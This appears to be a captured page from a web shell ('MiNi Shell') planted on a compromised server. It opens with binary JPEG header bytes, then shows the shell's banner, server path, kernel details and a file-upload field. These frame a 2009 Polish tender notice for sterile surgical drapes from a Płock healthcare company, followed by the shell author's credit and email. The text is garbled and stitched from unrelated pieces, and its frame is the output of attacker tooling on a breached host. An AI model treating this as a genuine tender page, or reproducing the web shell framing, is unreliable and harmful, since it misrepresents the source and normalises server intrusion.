JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/115542-N-2009.html

<p class="kh_header"><b>Płock: ZAKUP I DOSTAWA MATERIAŁÓW MEDYCZNYCH, OBŁOŻENIA POLA OPERACYJNEGO</b><br>
<b>Numer ogłoszenia: 115542 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o. , ul. Kościuszki 28, 09-402 Płock, woj. mazowieckie, tel. 024 3645100, 3645124, faks 024 3645102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpzoz-plock.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA MATERIAŁÓW MEDYCZNYCH, OBŁOŻENIA POLA OPERACYJNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet Nr 1 - Obłożenia jałowe pola operacyjnego, Pakiet Nr 2 - Obłożenia jałowe pola operacyjnego (cięcia cesarskie)
Termin dostawy przedmiotu zamówienia - sukcesywnie na podstawie cząstkowych zamówień przez okres 12 miesięcy od dnia podpisania umowy z zastrzeżeniem skrócenia czasu trwania umowy odpowiednio do wyczerpania przedmiotu zamówienia.
Termin realizacji zamówień cząstkowych wynosi maksymalnie 7 dni od dnia otrzymania zamówienia (w formie telefonicznej lub faxem) z wyjątkiem zamówień na cito realizowanych w terminie 24 godzin od momentu otrzymania zamówienia. 
Zaoferowany przedmiot zamówienia powinien:
a)	być nowy, pełnowartościowy i wyprodukowany zgodnie z obowiązującymi normami i standardami;
b)	posiadać stosowne dokumenty potwierdzające zgłoszenie przedmiotu zamówienia do Rejestru Wyrobów Medycznych i Podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania  zgodnie z Ustawą z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. Nr 93 z 2004 r. poz. 896), certyfikaty jakości CE, atesty, dokumenty dopuszczające do stosowania na terytorium RP  i w jednostkach służby zdrowia; 
c)	być bezpieczny w użyciu dla personelu medycznego i pacjentów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawijący nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenia zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 pkt. 1 - 10 oraz art. 24 ust. 2 pkt. 1 - 4 ustawy Prawo zamówień publicznych.
2.	Posiadają uprawnienia do wykonywania określonej działalności w zakresie objętym przedmiotem zamówienia.
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:
a.	warunek określony w pkt. 1) spełnia każdy z Wykonawców,
b.	warunek określony w pkt. 2) spełnia każdy z Wykonawców,
c.	warunek określony w pkt. 3) spełniają łącznie wszyscy Wykonawcy,
d.	warunek określony w pkt. 4) spełniają łącznie wszyscy Wykonawcy.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia nie spełnia, na podstawie dokumentów wymienionych poniżej. Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty występujące wspólnie. Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty. Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty.
Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.
W niniejszym postępowaniu Zamawiający nie będzie żądał zabezpieczenia należytego wykonania umowy.
Nie przewiduje się zawarcia umowy ramowej.
Nie ustanawia się dynamicznego systemu zakupów.
Nie przewiduje się wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku, o którym mowa, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Postępowanie o udzielenie zamówienia publicznego jest jawne. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu postępowania, z tym że oferty udostępnia się od chwili ich otwarcia. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępnione (zastrzeżenie należy dołączyć do oferty). Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy. 
Udostępnienie treści protokołu oraz otwartych ofert odbywać się będzie wg poniższych zasad:
a.	Zamawiający udostępni wskazane dokumenty po złożeniu pisemnego wniosku.
b.	Zamawiający wyznaczy termin, miejsce oraz zakres udostępnianych dokumentów i informacji.
c.	Zamawiający wyznaczy członka Komisji Przetargowej w obecności, którego udostępnione zostaną dokumenty.
d.	Zamawiający umożliwi kopiowanie udostępnionych dokumentów i informacji odpłatnie. Za wykonanie kserokopii dokumentów oraz za ich przesłanie Wykonawcy listownie Zamawiający będzie pobierał opłatę w wysokości określonej w Zarządzeniu Prezesa Zarządu Spółki Płocki Zakład Opieki Zdrowotnej Sp. z o.o.
e.	Wskazane we wniosku dokumenty postępowania będą udostępnione wyłącznie w siedzibie Zamawiającego oraz w czasie godzin jego urzędowania, tj. w godzinach 7:30-15:05.
f.	Bez zgody Zamawiającego zabrania się wykonywania zdjęć złożonych ofert.
g.	W sprawach nieuregulowanych zastosowanie mają przepisy ustawy oraz rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku w sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz.U. Nr 188, poz. 1154).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.	Do oferty należy załączyć następujące oświadczenia i dokumenty w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Załącznik  Nr 2 do SIWZ - na potwierdzenie warunków Rozdział III pkt. 1 - 4.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawione nie wcześniej niż 6 m - cy przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
3.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
II.	Do oferty należy załączyć również:
1.	Wypełniony Formularz cenowy: Pakiet Nr 1 - Obłożenia jałowe pola operacyjnego - Załącznik Nr 3a do SIWZ, Pakiet Nr 2 - Obłożenia jałowe pola operacyjnego (cięcia cesarskie) - Załącznik Nr 3b do SIWZ.
2.	Dokumenty zgodne z ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz. U. Nr 93 poz. 896 z późn. zm.) - przedmiot zamówienia musi posiadać stosowne dokumenty potwierdzające zgłoszenie przedmiotu zamówienia do Rejestru Wyrobów Medycznych i Podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, certyfikaty jakości CE, atesty, dokumenty dopuszczające do stosowania na terytorium RP i w jednostkach służby zdrowia. W przypadku produktów, które nie podlegają przepisami ww ustawy, Wykonawca zobowiązany jest dołączyć inne niż wyżej wymienione, odpowiednie dokumenty dopuszczające te produkty do obrotu i stosowania. Dokumenty te mogą być zastąpione stosownym oświadczeniem, iż Wykonawca posiada w/w dokumenty i zostaną udostępnione do wglądu na wniosek Zamawiającego. 
3.	Katalog oferowanych produktów umożliwiających ich dokładne zidentyfikowanie.
4.	Oświadczenie o pochodzeniu oferowanego asortymentu - należy podać nazwę i adres producenta.
5.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.
6.	Oświadczenie, że Wykonawca:
a.	nie zleci wykonania przedmiotu zamówienia podwykonawcom a całość prac wykona w ramach działań swojego przedsiębiorstwa 
lub
b.	zamierza powierzyć wykonanie części zamówienia podwykonawcom. Zamawiający żąda wskazania części zamówienia, której wykonanie zamierza powierzyć podwykonawcom (formularz oferty - Załącznik Nr 1 do SIWZ).
W przypadku złożenia oferty wspólnej pełnomocnictwo musi zawierać jednoznaczne upoważnienie do zaciągania zobowiązań, podpisywania umowy i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, podpisane przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. Termin, na jaki została zawarta umowa Wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
Pełnomocnictwo, o którym mowa w pkt. II. 5, musi zostać dołączone do oferty w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
Dokumenty, o których mowa w pkt, I. 1 - 3 winien załączyć każdy z przedsiębiorców składających ofertę wspólną.
Dokumenty wymienione w pkt. I. 2 - 3 i II. 2 należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej stosuje się do przepisów paragrafu 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 z poźn. zm.).
Zamawiający wezwie Wykonawców, którzy nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowany przedmiot zamówienia wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
Zamawiający może także w wyznaczonym przez siebie terminie, wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/SZPZOZ-Plock.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strony internetowej www.przetargi.ipzp.pl/SZPZOZ-Plock oraz w siedzibie Zamawiającego tj. Płocki Zakład Opieki Zdrowotnej Sp. z o.o. ul. Kościuszki 28, 09 - 402 Płock, pok. Nr 202..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - Płocki Zakład Opieki Zdrowotnej Sp. z o.o., 09 - 402 Płock, ul. Kościuszki 28,w  pokoju Nr 202..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - Obłożenia jałowe pola operacyjnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	j.m.	Ilość
1.	zestaw uniwersalny :		
 	1 serweta do nakrycia stołu instrumentariuszki 140 x 190cm		
 	1 serweta do nakrycia stolika Mayo 80 x 145cm		
 	1 serweta operacyjna 75 x 90cm		
 	2 samoprzylepne serwety operacyjne 75 x 90cm	komplet	100
 	1 samoprzylepna serweta operacyjna 170 x 175cm		
 	1 samoprzylepna serweta operacyjna 150 x 240cm		
 	1 taśma samoprzylepna 10 x 50cm		
 	4 ręczniki celulozowe 33 x 33cm		
2.	zestaw do artrooskopii :		 
 	1 serweta do nakrycia stołu instrumentariuszki 140 x 190cm		 
 	1 serweta do nakrycia stolika Mayo 80 x 145cm		 
 	1 serweta operacyjna 150 x 175cm		 
 	1 osłona na kończynę 25 x 80cm		 
 	1 serweta do artroskopii z torbą na płyny i uchwytem Velcro do mocowania kabli idrenów	komplet	200
 	(serweta posiada samouszczelniające się, elastyczne otwory 200x320		 
 	1 rurka drenowa 130cm		 
 	2 taśmy samoprzylepne 10 x 50cm		 
 	4 ręczniki celulozowe 33 x 33cm	 	 
3.	zestaw do zabiegów w chirurgii biodra :		 
 	1 serweta do nakrycia stołu instrumentariuszki 140 x 190cm		 
 	1 serweta do nakrycia stolika Mayo 80 x 145cm		 
 	1 serweta operacyjna 75 x 90cm		 
 	1 serweta operacyjna 150 x 200cm		 
 	1 serweta operacyjna 100 x 150cm	komplet	200
 	1 serweta samoprzylepna 170 x 300cm		 
 	1 serwta samoprzylepna z wycięciem U 200 x 260cm;		 
 	(wycięcie U 6,5 x 95cm		 
 	3 taśmy samoprzylepne 10 x 50cm		 
 	4 ręczniki celulozowe 33 x 33cm	 	 
4.	zestaw do zabiegów na kończynie :	 	
 	1 serweta do nakrycia stołu instrumentariuszki 140 x 190cm	 	
 	1 serweta do nakrycia stolika Mayo 80 x 145cm	 	
 	1 serweta operacyjna 150 x 175cm	 	
 	1 osłona na kończynę 25 x 80cm	 	
 	1 serweta do obłożenia kończyny z elastycznym,	komplet	200
 	samouszczelniającym się otworem oraz uchwytem Velcro  	 	
 	do mocowania kabli i drenów 200 x 320cm	 	
 	2 taśmy samoprzylepne 10 x 50cm	 	
 	4 ręczniki celulozowe 33 x 33cm	 	 
5.	zestaw do artroskopii stawu barkowego :	 	
 	1 serweta do nakrycia stołu instrumentariuszki 140 x 190cm	 	
 	1 serweta do nakrycia stolika Mayo 80 x 145cm	 	
 	1 osłona na kończynę 25 x 80cm	 	
 	1 serweta operacyjna (podkład pod kończynę) 150 x 175cm	komplet	50
 	1 serweta samoprzylepna z wycięciem U 200 x 260cm;		
 	wycięcie U 6,5 x 60cm		
 	1 serweta samoprzylepna (ekran anestezjologiczny) 150 x 240cm		
 	2 taśmy samoprzylepne 10 x 50cm		
 	4 ręczniki celulozowe 33 x 33cm		
6.	torba do artroskopii stawu barkowego 74 x 85cm	sztuka	40


odnośnie punktów 1-5 :	
włóknina 3 warstwowa 	
(polipropylen typu SMS+folia polietylenowa+włóknina wiskozowa)
o gramaturze 74g-m2 zdolność do absorpcji płynów 780%, 	
odpornośc na penetrację płynów >500Cm(H2O) 	
wytrzymałość na rozrywanie 120kPa.	
Zgpdne z wymaganiami normy EN 13 795 1-3.	
wycięcie w kształcie litery U-możliwość zbiórki płynów w czasie zabiegu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - Obłożenia jałowe pola operacyjnego, cięcia cesarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	j.m.	Ilość
1.	serweta sterylna, nieprzemakalna, wykonana z dwuwarstwowej 	 	
 	włókniny z włókien syntetycznych (polipropylen i polietylen),	 	
 	bez zawartości włókien celulozowych i wiskozowych,	 	
 	o gramaturze 60g/m2, niepalące (I klasa palności) 	sztuka	720
 	do cięcia cesraskiego o wymiarach 254 x 307cm z oknem w części	 	
 	brzusznej o wymiarach 30 x 30cm wypełnionymantybakteryjną 	 	
 	folią chirurgiczną zawierającą jodofor w wartwie klejącej	 	
 	i zintegrownym ze zbiornikiem 360	 	 
2.	serweta na stolik Mayo o wymiarach 80 x 145cm z włókniny 	 	
 	wiskozowej 35g/m2, laminowana folią polietylenową 54g/m2	sztuka	720
 	o grubości 60um	 	 
3.	serweta na stolik instrumentariuszki o wymiarach150 x 200cm	 	
 	wykonana z dwuwarstwowej włókniny z włókien syntetycznych	sztuka	720
 	(polipropylen i polietylen) bez zawartości włókien celulozowych i 	 	
 	wiskozowych o gramaturze 60g/m2, niepalące (I klasa palności).	 	 
4.	serweta do porodu o wymiarach 75 x 90cm, wykonana z dwu-	 	
 	warstwowej włókniny z włókien syntetycznych (polipropylen i	sztuka	6000
 	polietylen) bez zawartości włókien celulozowych i wiskozowych,	 	
 	o gramaturze 60g/m2, niepalące (I klasa palności) 	 	 
5.	serweta pod pośladki z torbą przechwytującą płyny przeznaczona do porodu o wymiarach 86 x 108cm	 	
 	Torba wykonana z folii,	 	
 	serweta zawiera warstwę chłonną pod pośladki o długości 25,4cm 	sztuka	1200
 	wykonana z dwuwarstwowej włókniny z włókien syntetycznych	 	
 	(polipropylen i polietylen) bez zawartości włókien celulozowych i wiskozowych o gramaturze 60g/m2, niepalące (I klasa palności)
	 	

odnośnie punktów 1-5
zgodnie z wymaganiami normy PN-EN 13 795
dla materiałów o wysokiej efektywności 
w obszarze krytycznym.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com